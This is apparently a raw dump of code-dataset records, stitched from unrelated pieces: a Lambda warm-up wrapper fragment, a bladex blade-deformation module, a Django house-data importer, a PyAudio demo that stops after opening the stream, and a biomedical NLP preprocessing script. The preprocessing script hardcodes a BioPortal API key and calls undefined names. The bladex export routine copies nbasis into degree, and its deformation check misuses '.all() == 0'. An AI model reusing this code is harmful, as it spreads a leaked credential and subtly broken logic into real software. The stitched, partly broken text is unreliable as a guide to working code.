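        if meta.get('action') == 'warm_up':
            if not IS_COLD_START:
                startup_ms = meta.get('settings', {}).get('startup_time', 0)
                time.sleep(startup_ms / 1000)
            return {'status': 200, 'xlambda_warmed': True}
        return handler(event=event, context=context)
    return wrapper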
able to:\n\n 1. compute coordinates of the optimal control points, provided their\n number from the parameter file.\n\n 2. update control points Y coordinates, provided the magnitude of the\n Y deformation from the parameter file.\n\n 3. generate B-spline curve using the computed control points (before or\n after their deformation), provided npoints from the parameter file\n for spline estimation.\n\n 4. plot parametric curves, with several options. Finally export a new\n parameter file containing the new deformed parameters.\n\n :param str paramfile: parameter file name\n :cvar str paramfile: parameter file name\n :cvar class param: class object instantiated by the module params, and\n contains all the attributes assigned by reading the parameter file.\n Possible attributes are:\n\n - `param.radii`\n - `param.parameters`\n - `param.nbasis`\n - `param.degree`\n - `param.deformations`\n\n First attribute is array defines the radial sections, while the\n remaining attributes are dictionaries with possible keys: `chord`,\n `pitch`, `rake`, `skew`, `camber`.\n\n :cvar dict deformed_parameters: dictionary that contains the deformed\n parameters at the same radial sections, provided some tolerance due to\n the spline interpolation. Possible dictionary keys are the parameters\n `chord`, `pitch`, `rake`, `skew`, `camber`. Default value is array of\n zeros with length equal to the radial sections.\n :cvar dict control_points: dictionary that contains the 2D coordinates of\n the control points associated with the B-spline parametric curve. The\n dictionary possible keys are the parameters `chord`, `pitch`, `rake`,\n `skew`, `camber`. Default value is None\n :cvar dict spline: dictionary that contains the B-spline interpolation for\n the parametric curves. The dictionary possible keys are the parameters\n `chord`, `pitch`, `rake`, `skew`, `camber`. Each value is a 2D numpy\n array containing the radii interpolations against the interpolations\n for one of the parameters mentioned in the dictionary keys. Default\n value is None.\n \"\"\"\n\n def __init__(self, paramfile):\n self.paramfile = paramfile\n self.param = ParamFile()\n self.param.read_parameters(filename=paramfile)\n self.deformed_parameters = {\n 'chord': np.zeros(self.param.radii.size),\n 'pitch': np.zeros(self.param.radii.size),\n 'rake': np.zeros(self.param.radii.size),\n 'skew': np.zeros(self.param.radii.size),\n 'camber': np.zeros(self.param.radii.size)\n }\n self.control_points = {\n 'chord': None,\n 'pitch': None,\n 'rake': None,\n 'skew': None,\n 'camber': None\n }\n self.spline = {\n 'chord': None,\n 'pitch': None,\n 'rake': None,\n 'skew': None,\n 'camber': None\n }\n\n @staticmethod\n def _optimum_control_points(X, Y, degree, nbasis, rbf_points):\n \"\"\"\n Private static method that computes the optimum coordinates of the\n B-spline control points.\n\n :param array_like X: Array of original points of the parametric curve\n X-axis, usually array of the radii sections\n :param array_like Y: radial distribution of parameter `chord` or\n `pitch` or `rake` or `skew` or `camber`, corresponding to the\n radial sections in X\n :param int degree: degree of the B-spline construction for the\n parametric curve\n :param int nbasis: number of control points associated with the\n parametric curve\n :param int rbf_points: if specified greater than zero, then the X and Y\n arrays are interpolated using the Wendland C2 radial basis function\n to produce X and Y arrays with length = rbf_points. 
The larger\n number of rbf_points implies better estimation of the optimum\n control coordinates. To turn it off (i.e. compute control points\n based on original X, Y arrays) then insert 0. (Negative values or\n None results in same effect as zero)\n :return: control points 2D coordinates\n :rtype: numpy.ndarray\n \"\"\"\n if not isinstance(rbf_points, int):\n # in case inserted as None, then converts to zero,\n # otherwise returns the inserted value. Useful when dealing with\n # the parameter as a flag\n rbf_points = int(rbf_points or 0)\n\n if rbf_points > 0:\n xx = np.linspace(X[0], X[-1], num=rbf_points)\n yy = np.zeros(rbf_points)\n reconstruct_f(\n original_input=X,\n original_output=Y,\n rbf_input=xx,\n rbf_output=yy,\n basis='beckert_wendland_c2_basis',\n radius=2.0)\n X = xx\n Y = yy\n\n A = np.zeros((len(X), nbasis))\n At = np.zeros((len(X), nbasis - 2))\n\n for i in range(nbasis):\n cv_new = np.zeros((nbasis, 3))\n cv_new[i, 0] = 1.\n # i-th basis function in the reference space\n A[:, i] = scipy_bspline(cv_new, A.shape[0], degree)[:, 0]\n\n # A tilde for the constraints on the first and last point\n At = A[:, 1:-1]\n # x and y of the ctrl points with constrained least square.\n # we subtract the contribution of the first and last basis function\n cvt_x = np.linalg.lstsq(\n At, X - A[:, 0] * X[0] - A[:, -1] * X[-1], rcond=-1)[0]\n cvt_y = np.linalg.lstsq(\n At, Y - A[:, 0] * Y[0] - A[:, -1] * Y[-1], rcond=-1)[0]\n\n # fill with the constraints the first and last point\n opt_ctrl = np.zeros((nbasis, 2))\n opt_ctrl[0, 0] = X[0]\n opt_ctrl[-1, 0] = X[-1]\n opt_ctrl[0, 1] = Y[0]\n opt_ctrl[-1, 1] = Y[-1]\n opt_ctrl[1:-1, 0] = cvt_x\n opt_ctrl[1:-1, 1] = cvt_y\n\n return opt_ctrl\n\n @staticmethod\n def _check_param(param):\n \"\"\"\n Private static method that checks the passed parameter.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the param value is not one of the previous\n \"\"\"\n params = ['chord', 'pitch', 'rake', 'skew', 'camber']\n if not param in params:\n raise ValueError(\n 'Valid param values are: \"chord\", \"pitch\", \"rake\", \"skew\",'\\\n ' \"camber\".')\n\n def _check_control_points(self, param):\n \"\"\"\n Private method to check if control points are computed.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the control points have None value, i.e. not\n computed\n \"\"\"\n if self.control_points[param] is None:\n raise ValueError(\n 'control_points has None value. You must compute them first.')\n\n def _check_spline(self, param):\n \"\"\"\n Private method to check if spline interpolation is computed.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the spline of that parameter curve has None\n value, i.e. not computed\n \"\"\"\n if self.spline[param] is None:\n raise ValueError(\n param + ' spline is None. You must first generate spline.')\n\n def _check_deformed(self, param):\n \"\"\"\n Private method to check if the deformed parameters are computed.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the deformed parameters have array of zeros,\n i.e. 
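scipy_bspline comes from the package's .ndinterpolator module; a hedged reconstruction of what such a helper typically looks like (clamped uniform knot vector evaluated with scipy.interpolate.BSpline) — the real implementation may differ:

import numpy as np
from scipy.interpolate import BSpline

def scipy_bspline(cv, npoints=100, degree=3):
    # Evaluate a clamped B-spline of the given degree through the control
    # points `cv` (shape (nbasis, dim)) at `npoints` parameter values.
    cv = np.asarray(cv)
    count = cv.shape[0]
    degree = int(np.clip(degree, 1, count - 1))
    kv = np.concatenate(([0] * degree,
                         np.arange(count - degree + 1),
                         [count - degree] * degree))
    u = np.linspace(0, count - degree, npoints)
    return np.array(BSpline(kv, cv, degree)(u))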
not computed\n \"\"\"\n if self.deformed_parameters[param].all() == 0:\n raise ValueError(param + ' deformed points are not computed.')\n\n def compute_control_points(self, param, rbf_points=1000):\n \"\"\"\n Compute the control points 2D coordinates for one of the parametric\n curves.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n :param int rbf_points: if greater than zero then the Wendland C2 radial\n basis function is used to interpolate the original arrays for the\n parametric curve, so that the control points are computed according\n to the interpolated arrays. Needless to mention that longer arrays\n would produce better estimation of the control points optimum\n coordinates. In order to turn off the rbf interpolation: specify\n either 0 or -1 (Also a None value can be used too). Default value\n is 1000\n \"\"\"\n self._check_param(param=param)\n self.control_points[param] = self._optimum_control_points(\n X=self.param.radii,\n Y=self.param.parameters[param],\n degree=self.param.degree[param],\n nbasis=self.param.nbasis[param],\n rbf_points=rbf_points)\n\n def update_control_points(self, param):\n \"\"\"\n Update the control point Y coordinate with the deformation values\n specified in the parameter file.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n \"\"\"\n self._check_param(param=param)\n self._check_control_points(param=param)\n\n if not self.control_points[param].shape[0] == len(\n self.param.deformations[param]):\n raise ValueError(\n 'array of deformations must equal to number of control points')\n\n for i in range(self.control_points[param].shape[0]):\n self.control_points[param][i, 1] += self.param.deformations[param][\n i]\n\n def generate_spline(self, param):\n \"\"\"\n Generate the B-spline interpolations, using the information: `degree`,\n `npoints` from the parameter file, as well as the computed 2D\n coordinates of the control points.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n \"\"\"\n self._check_param(param=param)\n self._check_control_points(param=param)\n\n self.spline[param] = scipy_bspline(\n cv=self.control_points[param],\n npoints=self.param.npoints[param],\n degree=self.param.degree[param])\n\n def compute_deformed_parameters(self, param, tol=1e-3):\n \"\"\"\n This method uses the spline npoints interpolation of the parametric\n curve to extract the parameters corresponding to the radial\n distribution of the original undeformed array. Therefore the resulting\n deformed parameters should be arrays of same length like that of the\n original parameters.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n :param float tol: tolerance required to find the B-spline estimation\n within the neighborhood of each of the radii sections. It is\n important to specify the value carefully as it depends on the order\n of the original array values, as well as the number of points for\n the spline interpolations. 
Default value is 1e-3\n \"\"\"\n self._check_param(param=param)\n self._check_spline(param=param)\n\n for i, val in enumerate(self.param.radii):\n index = np.where(np.fabs(self.spline[param][:, 0] - val) < tol)[0]\n if len(index) == 0:\n raise ValueError(\n 'Could not compute deformed parameter \"' + param +\n '\" at radius \"' + str(val) +\n '\". Either increase the tolerance for that parameter, or'\\\n ' increase the spline npoints in the parameter file.'\n )\n if index.shape[0] > 1:\n # In case more neighbors are found, then take first value only.\n index = index[0]\n self.deformed_parameters[param][i] = self.spline[param][index, 1]\n\n def compute_all(self,\n rbf_points=1000,\n tol_chord=1e-3,\n tol_pitch=1e-3,\n tol_rake=1e-3,\n tol_skew=1e-3,\n tol_camber=1e-3):\n \"\"\"\n Computes everything:\n - control points 2D coordinates\n - deformed control points\n - spline npoints interpolations\n - deformed parameters of the original arrays\n\n The previous procedure is applied for all the parameters: `chord`,\n `pitch`, `rake`, `skew`, `camber`\n\n :param int rbf_points: if greater than zero then the Wendland C2 radial\n basis function is used to interpolate the original arrays for the\n parametric curve, so that the control points are computed according\n to the interpolated arrays. Needless to mention that longer arrays\n would produce better estimation of the control points optimum\n coordinates. In order to turn off the rbf interpolation then\n specify either 0 or -1 (Also a None value can be used too). Default\n value is 1000\n :param float tol_chord: tolerance used to extract the chord radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_pitch: tolerance used to extract the pitch radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_rake: tolerance used to extract the rake radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_skew: tolerance used to extract the skew radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_camber: tolerance used to extract the camber radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n\n \"\"\"\n tols = {\n 'chord': tol_chord,\n 'pitch': tol_pitch,\n 'rake': tol_rake,\n 'skew': tol_skew,\n 'camber': tol_camber\n }\n params = ['chord', 'pitch', 'rake', 'skew', 'camber']\n for param in params:\n self.compute_control_points(param=param, rbf_points=rbf_points)\n self.update_control_points(param=param)\n self.generate_spline(param=param)\n self.compute_deformed_parameters(param=param, tol=tols[param])\n\n def _plot_parametric_curve(self,\n param,\n original=True,\n ctrl_points=True,\n spline=True,\n rbf=False,\n rbf_points=500,\n deformed=False,\n outfile=None):\n \"\"\"\n Private method to plot the parametric curve. Several options\n can be specified.\n\n :param str param: parameter corresponding to the parametric curve\n needs to be plotted. 
possible values are `chord`, `pitch`, `rake`,\n `skew`, `camber`\n :param bool original: if True, then plot the original points of the\n parameter at the radii sections.\n :param bool ctrl_points: if True, then plot the control points of\n that parametric curve.\n :param bool spline: If True, then plot the B-spline interpolation of\n the parametric curve.\n :param bool rbf: if True, then plot the radial basis functions\n interpolation of the parametric curve.\n :param int rbf_points: number of points used for the rbf interpolation,\n if the flag `rbf` is set True. Beware that this argument does not\n have the same function of that when computing the control points,\n although both uses the radial basis function interpolation with\n the Wendland basis.\n :param bool deformed: if True, then plot the deformed points of the\n parameter radial distribution, estimated using the B-spline\n interpolations within a given tolerance.\n :param str outfile: if string is passed, then the plot is saved\n with that name. If the value is None, then the plot is shown on\n the screen.\n \"\"\"\n self._check_param(param=param)\n\n plt.figure()\n\n if original:\n plt.plot(\n self.param.radii,\n self.param.parameters[param],\n 'o',\n label='original points')\n\n if ctrl_points:\n self._check_control_points(param=param)\n plt.plot(\n self.control_points[param][:, 0],\n self.control_points[param][:, 1],\n '*-',\n label='control points')\n\n if spline:\n self._check_spline(param=param)\n plt.plot(\n self.spline[param][:, 0],\n self.spline[param][:, 1],\n label='spline')\n\n if rbf:\n xx = np.linspace(\n self.param.radii[0], self.param.radii[-1], num=rbf_points)\n yy = np.zeros(rbf_points)\n reconstruct_f(\n original_input=self.param.radii,\n original_output=self.param.parameters[param],\n rbf_input=xx,\n rbf_output=yy,\n basis='beckert_wendland_c2_basis',\n radius=2.0)\n plt.plot(xx, yy, label='rbf')\n\n if deformed:\n self._check_deformed(param=param)\n plt.plot(\n self.param.radii,\n self.deformed_parameters[param],\n '+',\n label='deformed points')\n\n plt.grid(linestyle='dotted')\n plt.title(param + ' curve')\n plt.legend()\n\n if outfile:\n if not isinstance(outfile, str):\n raise ValueError('Output file name must be string.')\n plt.savefig(outfile)\n else:\n plt.show()\n\n def plot(self,\n param,\n original=True,\n ctrl_points=True,\n spline=True,\n rbf=False,\n rbf_points=500,\n deformed=False,\n outfile=None):\n \"\"\"\n Plot the parametric curve. Several options\n can be specified.\n\n :param array_like param: array_like of strings corresponding to the\n parametric curve that needs to be plotted. possible values are\n `chord`, `pitch`, `rake`, `skew`, `camber`\n :param bool original: if True, then plot the original points of the\n parameter at the radii sections. Default value is True\n :param bool ctrl_points: if True, then plot the control points of\n that parametric curve. Default value is True\n :param bool spline: If True, then plot the B-spline interpolation of\n the parametric curve. Default value is True\n :param bool rbf: if True, then plot the radial basis functions\n interpolation of the parametric curve. Default value is True\n :param int rbf_points: number of points used for the rbf interpolation,\n if the flag `rbf` is set True. Beware that this argument does not\n have the same function of that when computing the control points,\n although both uses the radial basis function interpolation with\n the Wendland basis. 
Default value is 500\n :param bool deformed: if True, then plot the deformed points of the\n parameter radial distribution, estimated using the B-spline\n interpolations within a given tolerance. Default value is False\n :param str outfile: if string is passed, then the plot is saved\n with that name. If the value is None, then the plot is shown on\n the screen. Default value is None\n \"\"\"\n if not isinstance(param, (list, tuple, np.ndarray)):\n param = [param]\n\n for par in param:\n self._plot_parametric_curve(\n param=par,\n original=original,\n ctrl_points=ctrl_points,\n spline=spline,\n rbf=rbf,\n rbf_points=rbf_points,\n deformed=deformed,\n outfile=outfile)\n\n def export_param_file(self, outfile='parameters_mod.prm'):\n \"\"\"\n Export a new parameter file with the new deformed parameters, while\n all other values are kept the same as in the original parameter file\n with the undeformed parameters. In the new parameter file (i.e. with\n deformed parameters) the deformations arrays become array of zeros.\n\n :param str outfile: file name to be written out\n \"\"\"\n\n prm = ParamFile()\n prm.radii = self.param.radii\n params = ['chord', 'pitch', 'rake', 'skew', 'camber']\n for param in params:\n if np.all(self.param.deformations[param] == 0):\n prm.parameters[param] = self.param.parameters[param]\n else:\n prm.parameters[param] = self.deformed_parameters[param]\n prm.nbasis[param] = self.param.nbasis[param]\n prm.degree[param] = self.param.nbasis[param]\n prm.npoints[param] = self.param.npoints[param]\n prm.deformations[param] = np.zeros(self.param.nbasis[param])\n\n prm.write_parameters(filename=outfile)\n","sub_path":"bladex/deform.py","file_name":"deform.py","file_ext":"py","file_size_in_byte":22659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"426320436","text":"from typing import Optional\n\nfrom django.core.management.base import BaseCommand\nimport csv\nfrom api.models import Address, Home, ZillowInfo\nfrom datetime import datetime\nimport pytz\n\n\ndef unit_multiplier(n, unit) -> int:\n if unit == \"M\":\n return n*1000000\n elif unit == \"K\":\n return n*1000\n raise NotImplementedError\n\n\ndef date_parser(date: str) -> Optional[datetime]:\n date = date.split(\"/\")\n if len(date) == 1:\n return None\n return datetime(year=int(date[2]),month=int(date[0]),day=int(date[1]),tzinfo=pytz.UTC)\n\n\nclass Command(BaseCommand):\n help = 'Imports data about houses'\n\n def add_arguments(self, parser):\n parser.add_argument(\"-s\", \"--strict\", action=\"store_true\", help=\"Gets the homes with all fields not null\")\n\n def handle(self, *args, **options):\n with open(\"../sample-data/data.csv\", mode=\"r\") as csv_file:\n csv_reader = csv.DictReader(csv_file)\n\n for row in csv_reader:\n\n if options[\"strict\"] and any([v == '' for v in row.values()]):\n continue\n\n address = Address.objects.create(\n street=\" \".join(row[\"address\"].split(\" \")[1:]),\n number=row[\"address\"].split(\" \")[0],\n zipcode=row[\"zipcode\"],\n state=row[\"state\"],\n )\n\n zillow_info = ZillowInfo.objects.create(\n zillow_id=row[\"zillow_id\"],\n last_sold_date=date_parser(row[\"last_sold_date\"]),\n last_sold_price=row[\"last_sold_price\"] or None,\n _link=row[\"link\"][len(ZillowInfo.zillow_base_link):],\n rent_price=row[\"rent_price\"] or None, #vacio\n rent_estimate_price=row[\"rentzestimate_amount\"] or None,\n rent_estimate_price_last_updated=date_parser(row[\"rentzestimate_last_updated\"]),\n 
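An end-to-end usage sketch for the class above; the file names are hypothetical and the import path assumes the package exposes Deformation at the top level:

from bladex import Deformation

deform = Deformation('parameters.prm')
deform.compute_all(rbf_points=1000)            # control points, deformation, splines
deform.plot(param='chord', deformed=True, outfile='chord_deformed.png')
deform.export_param_file('parameters_mod.prm')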
price=unit_multiplier(float(row[\"price\"][1:-1]), row[\"price\"][-1]),\n price_estimate=row[\"zestimate_amount\"] or None,\n price_estimate_last_updated=date_parser(row[\"zestimate_last_updated\"]),\n tax_value=int(float(row[\"tax_value\"])) if row[\"tax_value\"] else None,\n tax_year=row[\"tax_year\"],\n )\n\n Home.objects.create(\n n_bathrooms=row[\"bathrooms\"] or None,\n n_bedrooms=row[\"bedrooms\"],\n home_size=row[\"home_size\"] or None,\n property_size=row[\"property_size\"] or None,\n home_type=row[\"home_type\"],\n year_built=row[\"year_built\"] or None,\n zillow_info=zillow_info,\n address=address\n )\n\n self.stdout.write(\"Import finished\")\n","sub_path":"listings/api/management/commands/import_house_data.py","file_name":"import_house_data.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"410032947","text":"# coding=utf-8\n#================================================================\n#\n# File name : pyaudio_demo.py\n# Author : Faye\n# Created date: 2021/1/19 16:20 \n# Description :\n#\n#================================================================\n\nimport wave\nimport pyaudio\n\n\nCHUNK = 1024\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\nRECORD_SECONDS = 5\nWAVE_OUTPUT_FILENAME = \"output.wav\"\n\np = pyaudio.PyAudio()\nstream = p.open(format=FORMAT,\nchannels=CHANNELS,\nrate=RATE,\ninput=True,\nframes_per_buffer=CHUNK)\n\nprint(\"* recording\")","sub_path":"audio/_01_pyaudio/pyaudio_demo.py","file_name":"pyaudio_demo.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624981711","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jul 15 11:06:10 2019\r\n\r\n@author: Wang\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\nimport string\r\nimport nltk\r\nimport numpy as np\r\nimport xml.etree.ElementTree as ET\r\nimport urllib.request\r\nfrom SPARQLWrapper import SPARQLWrapper, JSON\r\nimport urllib.request, urllib.error, urllib.parse\r\nimport json\r\nimport os\r\nfrom pprint import pprint\r\n\r\n\r\nREST_URL = \"http://data.bioontology.org\"\r\nAPI_KEY = \"f6a71f57-a4ef-4389-9273-71c1faaf1605\"\r\n\r\ndef get_json(url):\r\n# get class from api\r\n opener = urllib.request.build_opener()\r\n opener.addheaders = [('Authorization', 'apikey token=' + API_KEY)]\r\n return json.loads(opener.open(url).read())\r\n\r\ndef label_obtain(annotations, get_class=True):\r\n #input the text you want to annotate into the web, and receive the label of words\r\n answer = []\r\n label = []\r\n for result in annotations:\r\n class_details = result[\"annotatedClass\"]\r\n if get_class:\r\n try:\r\n class_details = get_json(result[\"annotatedClass\"][\"links\"][\"self\"])\r\n except urllib.error.HTTPError:\r\n print(f\"Error retrieving {result['annotatedClass']['@id']}\")\r\n continue\r\n g = get_json(class_details[\"links\"][\"ancestors\"])\r\n# label.append(link[-1][\"prefLabel\"])\r\n for annotation in result[\"annotations\"]:\r\n from_to = (int(annotation[\"from\"]),int(annotation[\"to\"]))\r\n if g!=[]:\r\n if len(g)>1:\r\n label.append(g[-2]['prefLabel'])\r\n else:\r\n label.append(g[-1]['prefLabel'])\r\n else:\r\n label.append(\"Not Found\")\r\n \r\n answer.append(list(from_to))\r\n return answer,label\r\ndef getMeshIDFromLabel(disease,sparql):\r\n# used to find whether it is a disease\r\n disease = disease.lower()\r\n disease = \"\"\"'\"\"\" + disease + \"\"\"'\"\"\"\r\n # 
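The PyAudio record above ends right after opening the stream; the canonical PyAudio recording example continues with the loop below (a sketch reusing the same constants), which is presumably what the truncated file intended:

frames = []
for _ in range(int(RATE / CHUNK * RECORD_SECONDS)):
    frames.append(stream.read(CHUNK))

stream.stop_stream()
stream.close()
p.terminate()

wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()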
first we need to get the label\r\n query = \"\"\"PREFIX wikibase: \r\n PREFIX wd: \r\n PREFIX wdt: \r\n PREFIX rdfs: \r\n SELECT ?s ?p ?o\r\n WHERE { ?s rdfs:label\"\"\" + disease + \"\"\"@en}\"\"\"\r\n sparql.setQuery(query)\r\n sparql.setReturnFormat(JSON)\r\n results = sparql.query().convert()\r\n result = results[\"results\"][\"bindings\"]\r\n if len(result) > 0:\r\n # retrieve the result from Wikidata\r\n label = result[0][\"s\"][\"value\"]\r\n # make it as a subject URI\r\n subject = \"\"\"<\"\"\" + label + \"\"\">\"\"\"\r\n \r\n # then use the label as subject to retrieve\r\n # wdt:P486 is the predicate for mesh id\r\n query = \"\"\"PREFIX wikibase: \r\n PREFIX wd: \r\n PREFIX wdt: \r\n PREFIX rdfs: \r\n SELECT ?o WHERE { \"\"\" + subject + \"\"\" wdt:P486 ?o.}\"\"\"\r\n sparql.setQuery(query)\r\n sparql.setReturnFormat(JSON)\r\n results = sparql.query().convert()\r\n result = results[\"results\"][\"bindings\"]\r\n if len(result) > 0:\r\n # get mesh id\r\n meshid = result[0][\"o\"][\"value\"]\r\n else:\r\n # 1 indicates no result because there is no predicate of \"meshid\"\r\n meshid = \"1\"\r\n else:\r\n # 2 indicates no result because this term does not exist in Wikidata\r\n # we can try aliases or dbpedia\r\n meshid = \"2\"\r\n return meshid\r\nclass document():\r\n# fundamental class, used to store all the information got from the txt and ann.\r\n def __init__(self,text,origin,dic):\r\n self.ori = open(text).read()\r\n self.annotation = re.split(\"\\n\",open(origin).read())\r\n self.name = text\r\n self.text = nltk.word_tokenize(open(text).read()) \r\n self.context = str(open(text).read())\r\n i = 0\r\n annotation_copy = re.split(\"\\n\",open(origin).read())\r\n self.gram = nltk.pos_tag(self.text,tagset = 'universal')\r\n while i < len(self.annotation):\r\n if self.annotation[i] == \"\":\r\n del self.annotation[i]\r\n del annotation_copy[i]\r\n else:\r\n self.annotation[i] = re.split(\"\\t| \",self.annotation[i])\r\n annotation_copy[i] = re.split(\"\\t\",annotation_copy[i])[2]\r\n if self.annotation[i][0].find('#') != -1:\r\n self.annotation.pop(i)\r\n annotation_copy.pop(i)\r\n i-=1\r\n i+=1\r\n length = len(self.annotation)\r\n self.tag = [[] for g in range(length)]\r\n self.span = [[] for g in range(length)]\r\n for i in range(length):\r\n self.tag[i] = self.annotation[i][1]\r\n self.span[i] = re.split(' ',''.join(c for c in annotation_copy[i] if c not in string.punctuation))\r\n self.ori_text =[[] for i in range(len(self.text))]\r\n for i in range(len(self.text)):\r\n self.ori_text[i] = self.text[i]\r\n for g in range(len(self.text)):\r\n flag = 0\r\n res = [0 for i in range(50)]\r\n for i in range(len(dic)):\r\n if self.text[g].lower() == dic[i][0] and len(dic[i]) == 52:\r\n res = list(map(float,dic[i][1:51]))\r\n flag = 1\r\n break\r\n self.text[g] = res\r\ndef features(obj,index,sparql):\r\n# used to get the feature of each word\r\n past = [0 for i in range(50)] if index == 0 else obj.text[index-1]\r\n next_ = [0 for i in range(50)] if index == len(obj.text)-1 else obj.text[index+1]\r\n voc = np.append(np.append(obj.text[index],past),next_)\r\n caps = float(0.1*(obj.ori_text[index][0].upper() == obj.ori_text[index][0]) and (index!=0 and obj.ori_text[index-1] != '.'))\r\n# if obj.ori_text[index].isalpha() is True:\r\n# if getMeshIDFromLabel(obj.ori_text[index],sparql)!=1 or 2:\r\n# dis_exist = 1\r\n# else:\r\n# dis_exist = 0\r\n# else:\r\n# dis_exist = 0\r\n past_tag = (np.append(np.append(voc,caps),float(0.01*len(obj.ori_text[index]))))\r\n# return 
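Usage sketch for getMeshIDFromLabel, assuming the public Wikidata SPARQL endpoint; '1' and '2' are the function's own sentinel strings for the two no-result cases:

from SPARQLWrapper import SPARQLWrapper

sparql = SPARQLWrapper('https://query.wikidata.org/sparql')
meshid = getMeshIDFromLabel('asthma', sparql)
if meshid not in ('1', '2'):
    print('MeSH id:', meshid)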
list(np.append(past_tag,dis_exist))\r\n return past_tag\r\n \r\ndef tag(obj,index,pa):\r\n# used to get tag of each word\r\n global past\r\n flag =0\r\n loc = 0\r\n for i in range(len(obj.span)):\r\n if (obj.ori_text[index] in obj.span[i]) and ((len(obj.span[i]) ==1) or (obj.ori_text[index-1] in obj.span[i] or obj.ori_text[index+1] in obj.span[i])):\r\n flag =1\r\n loc = i\r\n if flag == 1:\r\n past = obj.tag[loc]\r\n\r\n else:\r\n past = \"Other\"\r\n return [past]\r\ndef location(obj,index):\r\n# used to get where one word locate in order to further step: achieve the vitualization goal\r\n global before\r\n start = obj.context.find(obj.ori_text[index],before)\r\n end = obj.context.find(obj.ori_text[index],before)+len(obj.ori_text[index])\r\n before = end\r\n return(obj.ori_text[index],start,end)\r\ndef transform(objects):\r\n# input the data stored in the classes, transform it into list/dictionary.\r\n x,y,loca = [],[],[]\r\n div,mark = 0,0\r\n# mark is used to find where the data can be divided into the train set and test set\r\n global past\r\n global before\r\n past = 0\r\n vecx = DictVectorizer(sparse=True)\r\n vecy = DictVectorizer(sparse=False)\r\n for i in range(len(objects)):\r\n if i == int(0.75*len(objects)):\r\n print(i)\r\n div = mark\r\n print(i)\r\n before = 0\r\n if objects[i].context!='':\r\n text_to_annotate = objects[i].context\r\n annotations = get_json(REST_URL + \"/annotator?text=\" + urllib.parse.quote(text_to_annotate))\r\n reference,label = label_obtain(annotations)\r\n for g in range (len(objects[i].ori_text)):\r\n loc = location(objects[i],g)\r\n exist = \"None\"\r\n if reference:\r\n if len(reference[0]) > 1:\r\n for n in range(len(reference)):\r\n if loc[1]+1>=reference[n][0] and loc[2]<=reference[n][1]:\r\n exist = label[n]\r\n else:\r\n if loc[1]+1>=reference[0] and loc[2]<=reference[1]:\r\n exist = label\r\n x.append(list(np.append(features(objects[i],g,sparql),exist)))\r\n y.append(tag(objects[i],g,past))\r\n mark += 1\r\n# loca.append(loc)\r\n# d = [[] for i in range(len(x))]\r\n# for i in range(len(x)):\r\n# d[i] = {'word':x[i][302]}\r\n# print(i)\r\n# onto = vecy.fit_transform(d)\r\n# x = np.delete(x,302,1)\r\n# x = np.append(x,onto,1)\r\n return x,y,div\r\ndef clean(x,y):\r\n# clean the empty list\r\n i = 0\r\n l = len(x)\r\n while i < l:\r\n if x[i] == []:\r\n del x[i]\r\n del y[i]\r\n l-=1\r\n i-=1\r\n i+=1\r\n return x,y\r\ndef clean_(x,y,z):\r\n# the same to above, with 3 input, specially designed for diliver the location information\r\n i = 0\r\n l = len(x)\r\n while i < l:\r\n if x[i] == []:\r\n del x[i]\r\n del y[i]\r\n del z[i]\r\n l-=1\r\n i-=1\r\n i+=1\r\n return x,y,z\r\n","sub_path":"LR_preprocess.py","file_name":"LR_preprocess.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540672783","text":"import math\r\n\r\ndef add(first, second):\r\n return first + second\r\n\r\ndef fibonacci(length):\r\n def internal(first, second, count):\r\n third = add(first, second)\r\n count -= 1\r\n if count < 2:\r\n return third\r\n else:\r\n return internal(second, third, count)\r\n\r\n return internal(0, 1, length)\r\n\r\nHEX_CHARS = {\r\n 10: 'A',\r\n 11: 'B',\r\n 12: 'C',\r\n 13: 'D',\r\n 14: 'E',\r\n 15: 'F'\r\n}\r\n\r\ndef convert_base(num, n, add=0):\r\n \"\"\"Change a base 10 number to a base-n number. Supports up to base 16. 
